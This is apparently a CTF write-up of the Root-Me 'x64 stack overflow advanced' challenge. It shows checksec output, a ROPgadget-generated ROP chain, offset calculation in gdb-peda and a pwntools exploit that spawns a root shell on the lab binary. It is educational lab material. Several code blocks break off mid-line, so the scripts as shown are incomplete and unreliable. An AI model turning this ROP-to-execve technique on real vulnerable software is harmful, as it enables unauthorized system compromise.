root-me:x64 stack overflow advanced

2017-11-29

x64 stack overflow advanced

general

its compile option:
gcc -o ch34 ch34.c -fno-stack-protector -Wl,-z,relro,-z,now,-z,noexecstack -static

universe exploit method:

  • leak a used function
  • calc offset with libc.so and the function to get system and /bin/sh
  • ret2libc(when NX enabled) or write shellcode

calc the truth address:

xxxx_got = libc.symbols['xxxx']
xxxx_addr = func_addr - (func_got - xxxx_got)

But in this program,static method was used to compile it,all the function address are static.

step

checksec:

[*] '/mnt/hgfs/pwnexc/root-me/x64 stack overflow advanced/ch34'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

According to above analysis we can use rop gadgets:

 ⚡ root@pwn  /mnt/hgfs/pwnexc/root-me/x64 stack overflow advanced  ROPgadget --binary ch34 --ropchain

get an universe rop chain:

#!/usr/bin/env python2
# execve generated by ROPgadget
from struct import pack

# Padding goes here
p = ''

p += pack('

calc the padding length:

Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004010ec in main ()
gdb-peda$ pattern_offset A%JA%fA%5
A%JA%fA%5 found at offset: 280

So the padding length is 280.

Another question we have to mention is that on my computer /bin/sh is a soft link of /bin/dash,but on the pratice computer is not.I need to edit the rop chain to make it run execve("/bin/dash",NULL,NULL) instead of execve("/bin/sh",NULL,NULL)

let's look at here:

p += pack('
  • extra / in string /bin//sh at line 4 is used to be stack alignment,alse we can use //bin/sh to produce the same effect
  • string end \0 is set at line 7-9

so we could devide ////////bin/dash into two parts://////// and bin/dash

# write first part
p += pack('
" at ".data + 16" p += pack('

exploit

#!/usr/bin/env python2
# execve generated by ROPgadget 

from pwn import *
from struct import pack

DEBUG = 1
if DEBUG:
    proc = process('./ch34')
else:
    s = ssh(host='challenge03.root-me.org',
            user='app-systeme-ch34',
            password='app-systeme-ch34',
            port=2223)
    proc = s.process('./ch34')

# Padding goes here
p = 'A'*280

p += pack('

run it:

 ⚡ root@pwn  /mnt/hgfs/pwnexc/root-me/x64 stack overflow advanced  python exp_ROPgadget.py 
[+] Starting local process './ch34': pid 5004
[*] Switching to interactive mode
Hex result: 4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141411b0100000c0100004141414141414141ffffffe71740
$ id
uid=0(root) gid=0(root) groups=0(root)
$